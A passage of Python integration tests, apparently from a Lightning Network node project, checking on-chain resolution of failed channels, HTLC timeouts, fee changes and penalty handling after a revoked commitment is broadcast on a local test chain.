l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Move some across to l2.
l1.pay(l2, 200000000)
assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
# Now, this will get stuck due to l1 commit being disabled..
t = executor.submit(l2.pay, l1, 100000000)
# Make sure we get signature from them.
l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')
# They should both have commitments blocked now.
l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
# Make sure both sides got revoke_and_ack for that commitment.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Take our snapshot.
tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']
# Let them continue
l1.rpc.dev_reenable_commit(l2.info['id'])
l2.rpc.dev_reenable_commit(l1.info['id'])
# Thread should complete.
t.result(timeout=10)
# Make sure both sides got revoke_and_ack for final.
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# Now we really mess things up!
bitcoind.rpc.sendrawtransaction(tx)
bitcoind.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
# FIXME: l1 should try to stumble along!
# l2 should spend all of the outputs (except to-us).
# Could happen in any order, depending on commitment tx.
needle = l2.daemon.logsearch_start
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')
l2.daemon.logsearch_start = needle
l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
'THEIR_REVOKED_UNILATERAL/OUR_HTLC')
l2.daemon.logsearch_start = needle
l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')
# FIXME: test HTLC tx race!
# 100 blocks later, all resolved.
bitcoind.generate_block(100)
wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
outputs = l2.rpc.listfunds()['outputs']
assert [o['status'] for o in outputs] == ['confirmed'] * 3
# Allow some lossage for fees.
assert sum(o['value'] for o in outputs) < 10**6
assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
"""Onchain handling where funder immediately drops to chain"""
# HTLC 1->2, 1 fails just after funding.
disconnects = ['+WIRE_FUNDING_LOCKED', 'permfail']
l1 = node_factory.get_node(disconnect=disconnects)
# Make locktime different, as we once had them reversed!
l2 = node_factory.get_node(options={'watchtime-blocks': 10})
l1.fundwallet(10**7)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 10**6)
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
"""Onchaind should not watch random spends"""
l1, l2 = node_factory.line_graph(2)
l1.pay(l2, 200000000)
l1.rpc.dev_fail(l2.info['id'])
l1.daemon.wait_for_log('Failing due to dev-fail command')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# 10 later, l1 should collect its to-self payment.
bitcoind.generate_block(10)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# First time it sees it, onchaind cares.
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
'OUR_DELAYED_RETURN_TO_WALLET')
# Now test unrelated onchain churn.
# Daemon gets told about wallet; says it doesn't care.
l1.rpc.withdraw(l1.rpc.newaddr()['address'], 'all')
bitcoind.generate_block(1)
l1.daemon.wait_for_log("but we don't care")
# And lightningd should respect that!
assert not l1.daemon.is_in_log("Can't unwatch txid")
# So these should not generate further messages
for i in range(5):
l1.rpc.withdraw(l1.rpc.newaddr()['address'], 'all')
bitcoind.generate_block(1)
# Make sure it digests the block
sync_blockheight(bitcoind, [l1])
# We won't see this again.
assert not l1.daemon.is_in_log("but we don't care",
start=l1.daemon.logsearch_start)
# Note: for this test we leave onchaind running, so we can detect
# any leaks!
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
options = {'watchtime-blocks': 201, 'cltv-delta': 101}
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options=options, disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(options=options)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')['payment_hash']
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 101,
'channel': '1:1:1'
}
l1.rpc.sendpay([routestep], rhash)
l1.daemon.wait_for_log('sendrawtx exit 0')
bitcoind.generate_block(1)
# Wait for nodes to notice the failure, this seach needle is after the
# DB commit so we're sure the tx entries in onchaindtxs have been added
l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
# We should at least have the init tx now
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0
# Generate some blocks so we restart the onchaind from DB (we rescan
# last_height - 100)
bitcoind.generate_block(100)
sync_blockheight(bitcoind, [l1, l2])
# l1 should still have a running onchaind
assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
l2.rpc.stop()
l1.restart()
# Can't wait for it, it's after the "Server started" wait in restart()
assert l1.daemon.is_in_log(r'Restarting onchaind for channel')
# l1 should still notice that the funding was spent and that we should react to it
l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
sync_blockheight(bitcoind, [l1])
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
"""Onchain handling of outgoing dust htlcs (they should fail)"""
# HTLC 1->2, 1 fails after it's irrevocably committed
disconnects = ['@WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# Must be dust!
rhash = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')['payment_hash']
routestep = {
'msatoshi': 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1:1:1'
}
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
payfuture.result(5)
# Retry payment, this should fail (and, as a side-effect, tickle a
# bug).
with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
l1.rpc.sendpay([routestep], rhash)
# 6 later, l1 should collect its to-self payment.
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 94 later, l2 is done.
bitcoind.generate_block(94)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Restart l1, it should not crash!
l1.restart()
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(6)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1:1:1'
}
l1.rpc.sendpay([routestep], rhash)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(5)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1 = node_factory.get_node()
l2 = node_factory.get_node(disconnect=disconnects)
l3 = node_factory.get_node()
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fund_channel(l1, 10**6)
c23 = l2.fund_channel(l3, 10**6)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
rhash = l3.rpc.invoice(10**8, 'middleman', 'desc')['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash)
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.isAlive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1 = node_factory.get_node(may_reconnect=True)
l2 = node_factory.get_node(disconnect=disconnects,
may_reconnect=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1:1:1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# We recognize different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1:1:1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash)
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for normal set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output 0 of .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l1.daemon.wait_for_log('htlc 0: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l1.daemon.wait_for_log('htlc 1: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l1.daemon.wait_for_log('htlc 2: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
# l1 and l7 ignore and HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
h = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'UNKNOWN_PAYMENT_HASH'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'UNKNOWN_PAYMENT_HASH'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
# We send second HTLC from different node, since they refuse to send
# multiple with same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h)
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h)
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h)
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h)
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# After at depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
